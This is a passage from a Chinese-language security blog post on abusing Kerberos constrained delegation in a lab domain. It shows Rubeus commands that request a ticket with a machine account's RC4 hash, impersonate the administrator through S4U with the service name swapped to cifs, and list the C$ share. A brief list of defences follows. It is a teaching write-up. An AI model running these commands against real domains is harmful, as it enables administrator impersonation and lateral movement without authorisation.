Q0JELkNPTaIdMBugAwIBAaEUMBIbEFdJTi02UjJNTU5HSkxJMySjBwMFAEDhAAClERgPMjAyMzA2MzAxNzM3MDBaphEYDzIwMjMwNzAxMDMzNzAwWqcRGA8yMDIzMDcwNzE3MzcwMFqoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3pwY2hjYmQuY29t /impersonateuser:administrator /msdsspn:www/WIN-MG4C5QO445H.zpchcbd.com /altservice:www /ptt

正常来说,当我以WIN-6R2MMNGJLI3主机账户伪造administrator账户访问www服务时,能正常访问,而伪造administrator用户访问cifs服务时是不能访问的,这是由于S4U2Proxy组件限制,所以WIN-6R2MMNGJLI3用户不能访问cifs服务,而这边WIN-MSSQL主机账户伪造administrator按道理来说也只能访问cifs,而不能访问www服务。

但是上面提到了这里存在一种利用就是"当S4U2Proxy向KDC申请对应服务的TGS后,返回的TGS中的server name是加密的,service name是不加密的,所以当我们在内存中修改TGS的service name,我们就能获取同一主机上不同服务的访问权限。",所以我们WIN-6R2MMNGJLI3主机账户伪造administrator账户访问www服务,同时也可以用来伪造cifs服务,这边只需要修改altservice参数即可,将其altservice参数修改为cifs,最终利用如下所示

首先先测试下cifs是否可以利用,可以看到默认没有权限的,如下图所示

接着这边WIN-6R2MMNGJLI3来进行伪造cifs服务,利用命令如下所示,只需要修改altservice为cifs即可

Rubeus.exe asktgt /user:WIN-6R2MMNGJLI3$ /domain:zpchcbd.com /rc4:a8b93c18dada22dcd0a2a54687882c65
Rubeus.exe s4u /ticket:doIFPDCCBTigAwIBBaEDAgEWooIETDCCBEhhggREMIIEQKADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0Gwt6cGNoY2JkLmNvbaOCBAYwggQCoAMCARKhAwIBAqKCA/QEggPw3DX/gV0jrArYVTBEA6ZEdASHd6sdayg90TCiJ6DFbJkKyUBW3sDm88xKxTcVIjlIsNa/Mawwenxct/UB7sBXjgpTCkjXWTXxOEnJGhLLl+tTFupVlA8jJ4sXvnjgb61I30j8NwCrMyLEyvIz3pB5CmfQE/sambAc9MpnrWDaJ/VVrOIs9ZLBbOMt0Bd/IrSDRAyldFLIj8qzRmiTRwI+zmNLMFBdvI4pmaUJne2Kjml19XmuxOlqynQ8/C7G6tvMs0G/aTj/7pPb2Rqin5odyBZLzmQf4SPJZZUcZyAWQY4S0icvK//HKBwzFkwF21WuaNOnY577sbYt8UhzP9jvm4nDND8nxauSMAxss11K24lfqgYUm4VsXcGiTMFMFjwDefV9vHdGoV+97w1c89gKDeoXU+FiITQu13X8cZrzDVlZ+iV+vCxbmo207Nxk93Yt4ETCOZuivf1CnD0TeMkz2DV5Lnj2+oSFK9VeYYpDvBfwv1dFcTcLcsItVDnH9hoPcdXM//M2iqwgVYXucDH936tqf88K9M05ReibhZnofhbl3KDpnBy0FNKCfHfYDwmn/7fR7uORZkbEjdr128GMfm5njARdHvKDbC4CABq38RXVBLB0TKl+w51jQeHLoRP8rphz38A5iSVItuTG/xgHyINZ4o1ZKEJ27jAuLlw3Wcj0H2SHORVZFPu/JrNC2yvcMnTExrZ3Z3U7vs+43zBjdaEWgONXR58x11RDzMikGnrX6sXENlYKGsszbL0u307ftxNK8CiPqeEMaXWDpHqJn06ZEgik259Oy+/5xhCYAdHy9mY9ybYR0YkiZOYJwThifUZ4aXReKQcwBfevuBQn2ht0jknaSlNfEodZV80qrfAUKlLEFfyYaVFxob0FE4thV+izA0e6/JUnKeLttR5iNFip7cw6Ju7zBGwbhIKZi7QHG3EHZmVnGlk6R3G3K9tuxqJZu/EkpmQ24C+Z0oPyMiCZ+ldfuqtg9k8h0bb1zepD/re9BroXMP7IPBMlOUtKfgQl0dglgHucWku7AhGkdLLW58RnX6Wp3zIY+id6K+89M0CYoBYigIdEuJcebG/EXMlqbu6iTNkkRWf1z1ksy7C5OQTRtld6VHGGQbXAWrodC56M4fBoIznB4lE30VnnTSQOUW9eNRkVbWFcmDdHsfV2OVbZjXy68TCAuUrsZ4tPpzbBz/WP5cS1eLsM/ttycaU7gZQqvFIT+b+2yenemNXXaKmjvAl7tcYSSLWcU/Ale2+wqbTBLLlzjNgk+Yn1I2myWeeJ/U51vbsEU1AX6/F8kyVOqCZj8O05/JbDofg4A8JCCIh8ZXa7Zm8Xp4tro4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gGzAZoAMCARehEgQQ2d+hpn8fDOTGdbBE0scWGKENGwtaUENIQ0JELkNPTaIdMBugAwIBAaEUMBIbEFdJTi02UjJNTU5HSkxJMySjBwMFAEDhAAClERgPMjAyMzA2MzAxNzM3MDBaphEYDzIwMjMwNzAxMDMzNzAwWqcRGA8yMDIzMDcwNzE3MzcwMFqoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3pwY2hjYmQuY29t /impersonateuser:administrator /msdsspn:www/WIN-MG4C5QO445H.zpchcbd.com /altservice:cifs /ptt
dir \\WIN-MG4C5QO445H.zpchcbd.com\c$

关于约束委派的防御方法:

  • 高权限用户没有在特殊要求之下设置为不可委派,比如administrator

  • 微软推出了protected users组,组内用户不允许被委派,适用于Windows Server 2016,Windows Server 2012 R2、 Windows Server 2012

基于非约束/约束委派的总结

攻击路线:

1、判断已有的账号是否是约束/非约束委派账户
2、获取非约束委派账户凭证/主机权限
3、利用Kerberoasting攻击获取服务账号密码

posted @ 2020-05-22 19:07  zpchcbd  阅读(4736)  评论(1编辑  收藏  举报